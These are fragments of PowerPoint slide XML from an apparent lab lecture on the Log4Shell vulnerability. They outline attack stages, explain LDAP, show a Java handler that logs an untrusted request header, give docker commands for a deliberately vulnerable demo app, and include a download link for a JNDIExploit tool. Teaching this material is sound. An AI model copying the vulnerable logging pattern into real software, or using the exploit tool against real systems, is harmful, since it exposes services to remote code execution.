              <a:t>Data Exfiltration or Further Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Depending on their objectives, the attacker may use the compromised system to exfiltrate data, launch additional attacks on other systems, or engage in other nefarious activities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Covering Tracks: To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>maintain their presence and evade detection, the attacker may take actions such as deleting logs, installing backdoors, or employing other strategies to conceal their activities on the compromised system.</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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2756643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https://www.dropbox.com/scl/fi/9okmxbrlm13b5oj9hbvds/JNDIExploit.v1.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>.zip</a:t>
            </a:r>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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349520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StateDiagram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rankdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=TB; // Top to bottom layout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  node [shape=box, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fontsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=12, width=2];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Attacker [label="Attacker"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Victim [label="Victim"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  subgraph </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cluster_attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    label="Attacker States";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    color=red;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    style=dotted;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    Idle;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    Identifying;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    Exploiting;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    Control;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PrivilegeEscalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    Exfiltrating;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CoveringTracks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  subgraph </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cluster_victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    label="Victim States";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    color=blue;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    style=dotted;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NormalOperation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    Vulnerable;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    Compromised;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ControlLoss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    Alert;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    Recovery;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  // Attacker state transitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Attacker -&gt; Identifying;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Identifying -&gt; Exploiting;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Exploiting -&gt; Control;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Control -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PrivilegeEscalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PrivilegeEscalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -&gt; Exfiltrating;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Exfiltrating -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CoveringTracks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  // Victim state transitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Victim -&gt; Vulnerable;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Vulnerable -&gt; Compromised;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Compromised -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ControlLoss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ControlLoss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -&gt; Alert;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Alert -&gt; Recovery;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146215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https://github.com/christophetd/log4shell-vulnerable-app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.lunasec.io/docs/blog/log4j-zero-day/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{132FFCAB-4F71-4364-B479-A88DA389FC0C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261445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@GetMapping("/")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>public String index(@RequestHeader("X-Api-Version") String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>apiVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>    logger.info("Received a request for API version " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>apiVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>    return "Hello, world!";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207929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74151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Data Storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: An LDAP server stores information in a tree-like structure, similar to how folders and files are organized on a computer. Each piece of data is called an "entry" and has a unique identifier called a "Distinguished Name" (DN).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Data Retrieval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: LDAP servers allow users and applications to search for and retrieve specific pieces of information quickly. This is especially useful for finding things like user profiles, contact details, or network resources in a large organization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: LDAP servers often play a crucial role in user authentication. When you log in to a system or application, it can check your credentials (like a username and password) with an LDAP server to confirm your identity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: They can also manage permissions and access control. For example, they can determine who has access to certain resources based on their roles or group memberships.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Integration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: LDAP servers can be integrated with various systems and services, such as email servers, web applications, and network devices. This makes it easier to manage user accounts and access across an organization.</a:t>
            </a:r>
          </a:p>
          <a:p>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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166217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https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{132FFCAB-4F71-4364-B479-A88DA389FC0C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263063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sudo apt install docker.io</a:t>
            </a:r>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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="106838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GB" dirty="0"/>
              <a:t>docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>christophetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929</a:t>
            </a:r>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91259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docker run: This is the Docker command used to run a container.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>--name vulnerable-app: This part of the command assigns a name to the Docker container. In this case, the name "vulnerable-app" is given to the container.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>--rm: This flag tells Docker to automatically remove the container when it stops running. It's often used for temporary or disposable containers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>-p 8080:8080: This flag maps ports between the host machine and the container. It specifies that port 8080 on the host should be mapped to port 8080 in the container. This allows you to access the application running in the container on port 8080 of your host machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>ghcr.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>christophetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929: This is the image name and tag for the Docker container. It specifies the image to use when creating the container. In this case, the container is based on an image located at the specified URL (ghcr.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>christophetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>/log4shell-vulnerable-app) and tagged with a specific hash (@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929). The image likely contains a vulnerable application for testing purposes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{132FFCAB-4F71-4364-B479-A88DA389FC0C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221347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2.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17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink12.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink33.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink44.xml"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink71.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink7.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><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50.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink39.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink53.xml"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink66.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink4.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink47.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink15.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink23.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink61.xml"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink69.xml"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink42.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink10.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink18.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink31.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink56.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink64.xml"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink37.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId91" 